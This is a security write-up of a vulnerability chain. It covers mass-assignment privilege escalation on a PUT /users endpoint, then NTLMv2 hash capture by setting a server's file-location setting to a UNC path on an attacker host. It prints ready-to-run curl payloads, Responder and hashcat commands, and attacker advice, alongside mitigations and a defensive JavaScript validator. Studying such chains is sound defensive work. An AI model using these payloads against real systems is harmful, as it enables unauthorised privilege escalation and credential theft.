Critical Real-World Vulnerabilities: BAC to NTLM Hash Capture

This article details a high-impact vulnerability chain that allowed the capture of a server’s NTLMv2 hash through Broken Access Control (BAC) and SMB relay techniques. Below is an extended breakdown with practical commands and steps.

Part 1: Enumeration

The target web app had role-based user management. Admins could modify other users, while regular users could only edit their own profiles via PUT /users.

Key Commands:

  • CURL for User Enumeration:
    curl -X GET https://target.com/users -H "Authorization: Bearer <token>"

  • Check User Permissions (a regular user updating their own record):
    curl -X PUT https://target.com/users -H "Content-Type: application/json" -d '{"userId": "my-id", "email": "[email protected]"}'

Part 2: Mass Assignment & BAC Exploit

The update endpoint bound every field of the JSON body onto the user record (mass assignment). By adding a `role` parameter to an ordinary self-update, privilege escalation was achieved:

Exploit Payload:

curl -X PUT https://target.com/users -H "Content-Type: application/json" -d '{"userId": "my-id", "role": "admin"}'

Mitigation:

  • Bind only an allowlist of user-editable fields on the server side; never accept `role` (or any other privilege-bearing field) from the request body.
  • Enforce role checks in middleware, so that only an admin can modify another user's record or change a role.

Part 3: Further Enumeration as Admin

Discovered a role management panel, created a `superadmin` role, and assigned full permissions.

Linux Command to Simulate Role Creation:

echo '{"role": "superadmin", "permissions": [""]}' | jq .

Part 4: SMB Relay & NTLMv2 Hash Capture

The `File Location` server setting accepted an arbitrary path. Setting it to a UNC path pointing at the attacker's host made the server open an outbound SMB connection and authenticate, which exposed its NTLMv2 challenge-response to the listener:

Steps:

1. Set Up Responder:

sudo responder -I eth0 -wF

2. Trigger SMB Auth:

curl -X POST https://target.com/server-settings -H "Content-Type: application/json" -d '{"fileLocation": "\\\\attacker-ip\\share"}'

Expected Responder Output:

NTLMv2-SSP hash captured from <target-ip>

Part 5: Hash Cracking (Optional)

Use `hashcat` (mode 5600, NetNTLMv2) to attempt to crack the captured hash offline:

hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

What Undercode Says

This attack chain demonstrates how basic flaws (BAC, insecure role assignment, and SMB misconfigurations) can lead to domain compromise. Key takeaways:

– For Defenders:
  – Disable NTLM where possible.
  – Enforce strict input validation.
  – Monitor and block outbound SMB (TCP 445) from servers.
– For Attackers:
  – Always test mass assignment.
  – Leverage Responder for internal network pivoting.

Relevant Commands for Defense:

Harden NTLM on Windows (LmCompatibilityLevel 5 sends NTLMv2 responses only and refuses LM and NTLMv1; it does not disable NTLMv2 itself, so it narrows rather than removes the relay exposure shown above):
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v LmCompatibilityLevel /t REG_DWORD /d 5 /f

Block outbound SMB via firewall (Linux host):
sudo iptables -A OUTPUT -p tcp --dport 445 -j DROP
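The two server-side checks that break this chain, as an added example that is not code from the original post or from the affected application: an allowlisted user update with a BAC check (Part 2) and a file-location validator that refuses UNC paths and URLs (Part 4). The handler names, field names and `BASE_DIR` are assumptions.

```javascript
// Added example, not the original application's code. Names are hypothetical.

// Fields a caller may set on a user record. `role` is deliberately absent:
// it may only change through the dedicated admin role-management path.
const SELF_EDITABLE = new Set(["email", "displayName"]);

// Core of the PUT /users handler. `actor` is the authenticated caller,
// `body` the parsed JSON payload, `store` a Map of id -> user record.
function updateUser(actor, body, store) {
  const target = store.get(body.userId);
  if (!target) return { status: 404 };
  // BAC check: only the record owner or an admin may edit this record.
  if (actor.id !== target.id && actor.role !== "admin") return { status: 403 };
  // Mass-assignment check: reject unknown fields rather than silently binding them.
  for (const key of Object.keys(body)) {
    if (key !== "userId" && !SELF_EDITABLE.has(key)) {
      return { status: 400, error: `field not allowed: ${key}` };
    }
  }
  for (const key of SELF_EDITABLE) {
    if (key in body) target[key] = body[key];
  }
  return { status: 200, user: target };
}

// Server-settings handler: the file location must stay a local path under
// BASE_DIR, so it can never become a UNC path or URL that makes the server
// authenticate outbound to a host of the caller's choosing.
const BASE_DIR = "/srv/app/files"; // assumed deployment directory
function setFileLocation(value) {
  const s = String(value);
  if (/^[a-z][a-z0-9+.-]*:\/\//i.test(s)) return { ok: false, reason: "URL scheme" };
  if (s.includes("\\") || s.startsWith("//")) return { ok: false, reason: "UNC path" };
  if (s.split("/").includes("..")) return { ok: false, reason: "path traversal" };
  if (!s.startsWith(BASE_DIR + "/")) return { ok: false, reason: "outside base dir" };
  return { ok: true, path: s };
}
```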

Expected Outcome of the Attack Chain:

A captured NTLMv2 hash and potential lateral movement via relay attacks.

Reported By: Florian Ethical – Hackers Feeds